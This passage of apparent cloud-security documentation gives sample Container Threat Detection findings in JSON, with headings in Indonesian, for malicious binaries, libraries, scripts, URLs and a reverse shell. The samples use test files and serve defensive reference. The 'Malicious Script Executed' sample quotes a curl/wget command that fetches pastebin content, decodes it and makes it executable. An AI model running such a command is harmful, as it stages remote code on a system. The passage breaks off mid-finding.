"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911603",
"nanos": 535268047
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Eksekusi: Eksekusi Biner Berbahaya Bawaan
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Built in Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:57.405Z",
"database": {},
"eventTime": "2023-11-13T21:38:57.250Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"NATIVE_API"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/eicar_testing_file\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/eicar_testing_file\"",
"\"built-in-malicious-binary-818358caa95b6d42\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-built-in-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "built_in_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 603253608
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1106/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Eksekusi: Modifikasi Biner Berbahaya Dieksekusi
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:51.893Z",
"database": {},
"eventTime": "2023-11-13T21:38:51.525Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/file_to_be_modified\"",
"\"modified-malicious-binary-da2a7b72e6008bc3\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Eksekusi: Library Berbahaya yang Dimodifikasi Dimuat
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Modified Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:38:55.271Z",
"database": {},
"eventTime": "2023-11-13T21:38:55.133Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/malicious_files/file_to_be_modified\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/malicious_files/file_to_be_modified\"",
"\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-modified-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.77.124.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.77.124.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "modified_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911519",
"nanos": 124151422
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Skrip Berbahaya Dieksekusi
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Malicious Script Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Script_Filename": "FILENAME",
"Script_SHA256": "SHA_256",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "INTERPRETER",
"Process_Arguments": ["INTERPRETER", "FILENAME"],
"Pod_Name": "POD_NAME",
"description": "A machine learning model using Natural Language Processing (NLP) techniques identified an executed bash script as malicious.",
"Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Script_Content": {
"primitiveDataType": "STRING"
},
"Script_Filename": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Script_SHA256": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
URL Berbahaya Teramati
{
"findings": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Malicious URL Observed",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2022-09-14T21:35:46.209Z",
"database": {},
"description": "A malicious URL is observed in the container workload.",
"eventTime": "2022-09-14T21:35:45.992Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {
"uris": [
"testsafebrowsing.appspot.com/s/malware.html"
]
},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/bin/echo\""
},
"script": {},
"args": [
"\"/bin/echo\"",
"\"https://testsafebrowsing.appspot.com/s/malware.html\""
],
"envVariables": [
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"CONTAINER_NAME\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"IP_ADDRESS\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://IP_ADDRESS:443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
}
],
"pid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "MEDIUM",
"sourceDisplayName": "Container Threat Detection",
"state": "ACTIVE",
"vulnerability": {},
"workflowState": "NEW"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Process_Binary_Fullpath": "/bin/echo",
"description": "A malicious URL is observed in the container workload.",
"VM_Instance_Name": "VM_INSTANCE_NAME",
"Pid": 1,
"Process_Arguments": [
"/bin/echo",
"https://testsafebrowsing.appspot.com/s/malware.html"
],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Parent_Pid": 0,
"Process_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 7717272
},
"Environment_Variables": [
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=CONTAINER_NAME",
"DEBIAN_FRONTEND=noninteractive",
"LANG=C.UTF-8",
"PYTHONUNBUFFERED=1",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
"KUBERNETES_SERVICE_HOST=IP_ADDRESS",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"KUBERNETES_PORT=tcp://IP_ADDRESS:443",
"KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_PORT_443_TCP_PORT=443",
"HOME=/root"
],
"Container_Creation_Timestamp": {
"seconds": 1663191345,
"nanos": 0
},
"Pod_Name": "CONTAINER_NAME"
}
}
Reverse Shell
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Reverse Shell",
"sourceProperties": {
"Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
"Environment_Variables": ["HOSTNAME\u003dreverse-shell",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
"HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
